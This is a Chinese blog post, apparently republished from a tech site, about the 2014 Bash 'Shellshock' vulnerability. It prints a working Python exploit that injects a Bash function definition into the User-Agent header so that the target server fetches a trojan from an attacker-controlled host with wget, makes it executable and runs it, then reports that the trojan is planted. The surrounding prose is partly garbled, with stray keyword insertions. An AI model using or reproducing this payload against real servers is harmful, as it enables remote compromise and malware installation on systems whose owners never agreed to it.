Bash漏洞收集

过去两天，Bash漏洞确实引起了人们的关注bash 漏洞 工具，主要的SRC漏洞每天都在大量扫描.

关于该漏洞的详细信息和范围，毋庸置疑，许多安全媒体已经报告了此漏洞. 涉及的范围很广，从WEB服务器到Extranet设备，只要它涉及BASH历史上留下的漏洞，就全都遵循.

qq混合组的一些配菜很着急. 它们都不适合使用exp. 大多数新闻网络仅提供检测方法和修复方法.

如果我想研究漏洞，该怎么办？我想来去去，没关系，让我们在这里提供对exp的一部分使用，以供小白参考.

Bash命令执行漏洞python小脚本（非批处理，建议与URL收集工具一起使用）

查找Bash漏洞的示例

CVE2014-6271 exp和批处理expp

BASH远程命令执行漏洞[POC]

％2B％2B.pyBash攻击脚本

直接发布帖子:

#!/usr/bin/python
# coding=UTF-8
__author__ = ‘Andy’
import requests
import sys
try:
if sys.argv[1] == ‘–help’:
print ‘usage : python test.py http://mydomain.com trojan.sh http://target.com’
exit(1)
except IndexError:
print ‘usage : python test.py http://mydomain.com trojan.sh http://target.com’
exit(1)
headers = {
‘Accept’: ‘text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8′,
‘Accept-Encoding’: ‘gzip,deflate,sdch’,
‘Accept-Language’: ‘zh-CN,zh;q=0.8,gl;q=0.6,zh-TW;q=0.4′,
‘Cache-Control’: ‘no-cache’,
‘Connection’: ‘keep-alive’,
‘Referrer’ : ’10001.qzone.qq.com’,
‘User-Agent’: ‘() { :; }; /usr/bin/wget ‘+sys.argv[1]+’/'+sys.argv[2]+’ -O /tmp/’+sys.argv[2]+’ | /bin/chmod 777 /tmp/’+sys.argv[2]+’ | /tmp/’+sys.argv[2]+”
}
try:
res = requests.get(sys.argv[3], headers=headers, timeout=10)
except ConnectionError:
print ‘DNS 查询失败’
except HTTPError:
print ‘DNS 查询失败’
except Timeout:
print ‘服务器响应超时’
except TooManyRedirects:
print ‘超过了设定的最大重定向次数’
if res.status_code == 200:
print ‘植入木马已经完成, 请检查您的服务器下载记录’

漏洞已经扩散了很多. 我希望白帽子可以借此机会提交漏洞以减轻损害范围并促进网络安全bash 漏洞 工具，而不是破坏和恶意利用主机.

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-147933-1.html